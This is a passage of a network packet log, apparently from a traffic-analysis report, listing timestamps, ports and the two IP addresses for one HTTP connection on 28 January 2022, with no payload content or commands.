Jan 28, 2022 21:30:07.020586014 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020591974 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020606041 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020616055 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020626068 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020644903 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020656109 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020665884 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020684958 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020697117 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020705938 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020725012 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020740032 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020745039 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020766020 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020777941 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020785093 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020817041 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.021140099 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.213793993 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.213829994 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.213843107 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.213891029 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.213956118 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.331001043 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331036091 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331052065 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331068993 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331084013 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331099987 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331116915 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331135988 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331151009 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331167936 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331182003 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331197977 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331213951 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331228971 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.331227064 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.331269979 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333695889 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333723068 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333738089 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333755016 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333770037 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333785057 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333796978 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333803892 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333810091 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333826065 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333830118 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333846092 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333867073 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333880901 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333897114 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333911896 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333920956 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333924055 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333940983 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333950043 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333956957 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333973885 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.333981991 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.333990097 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334007025 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334023952 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334031105 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.334039927 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334055901 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334073067 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334079981 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.334089994 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334105968 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334120989 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334142923 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.334153891 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334171057 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334182024 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.334187031 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334204912 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.334229946 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.334471941 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.527256966 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.527333975 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.527487040 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644275904 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644332886 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644376040 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644381046 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644433975 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644474030 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644480944 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644520998 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644553900 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644562006 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644603014 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644634962 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644644976 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644686937 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644720078 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644728899 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644778013 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644817114 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644818068 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644860029 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644893885 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.644901037 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644939899 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.644973040 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647159100 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647228956 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647250891 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647272110 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647300005 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647306919 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647326946 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647329092 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647356033 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647383928 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647383928 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647408962 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647435904 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647438049 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647464037 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647490978 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647490978 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647520065 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647547007 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647547960 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647573948 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647600889 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647605896 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647629023 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647655964 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647656918 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647682905 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647708893 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647710085 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647736073 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647762060 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647763014 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647789955 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647816896 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647818089 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647845984 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647872925 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647874117 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647901058 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647927046 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647928953 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.647953987 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647979975 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.647979975 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.841469049 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.841715097 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.841733932 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.841813087 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.841916084 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.841917038 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.841983080 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.842041016 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.842067957 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.842103958 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.842216015 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.842709064 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.842775106 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.842894077 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.842906952 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843041897 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843130112 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843198061 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843261003 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843312025 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843357086 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843369007 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843410969 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843442917 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843451023 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843489885 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843518972 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843528986 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843571901 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843596935 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843610048 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843647957 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843674898 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843688965 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843725920 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843755007 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843765020 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843803883 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.843822956 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.843898058 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.957936049 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.957963943 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.957977057 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.957989931 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958005905 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958024025 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958033085 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958035946 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958055019 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958069086 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958072901 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958072901 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958081961 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958092928 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958110094 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958117962 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958127022 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958144903 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958156109 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958162069 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958178997 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958192110 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958208084 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958211899 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958228111 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958228111 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958245993 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958257914 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958261967 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958278894 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958288908 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958295107 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958311081 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958327055 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958334923 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958343983 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958355904 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958360910 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958379030 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958390951 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958394051 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958410025 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958422899 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958425999 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958441973 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958456993 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.958462000 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958486080 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.958540916 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.960843086 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960867882 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960880041 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960896969 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960913897 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960916996 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.960932016 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960937023 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.960951090 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960962057 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.960967064 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960984945 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.960994959 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961003065 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961019039 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961030960 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961035967 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961051941 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961062908 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961069107 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961086035 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961102009 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961107969 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961118937 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961136103 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961138010 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961150885 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961163044 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961168051 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961186886 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961196899 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961201906 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961219072 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961234093 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961250067 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961257935 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961266994 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961267948 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961282969 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961302996 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961303949 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961322069 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961335897 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961340904 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961354017 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961364031 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961369991 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961386919 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961402893 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961405993 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961419106 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961430073 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961436987 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961452007 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961466074 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961467981 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961486101 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961502075 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961503983 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961519003 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961529970 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961535931 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961551905 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961566925 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961570024 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961582899 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961595058 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961599112 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961616039 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961627007 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961632013 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961648941 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961658955 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961664915 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961680889 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961694956 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961698055 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961711884 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961728096 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961730003 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961745024 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961759090 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961766005 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961776018 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961786985 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.961792946 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.961818933 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155258894 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155345917 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155407906 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155424118 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155461073 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155500889 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155508995 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155551910 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155688047 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155721903 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155765057 CET	80	49167	139.59.58.214	192.168.2.22
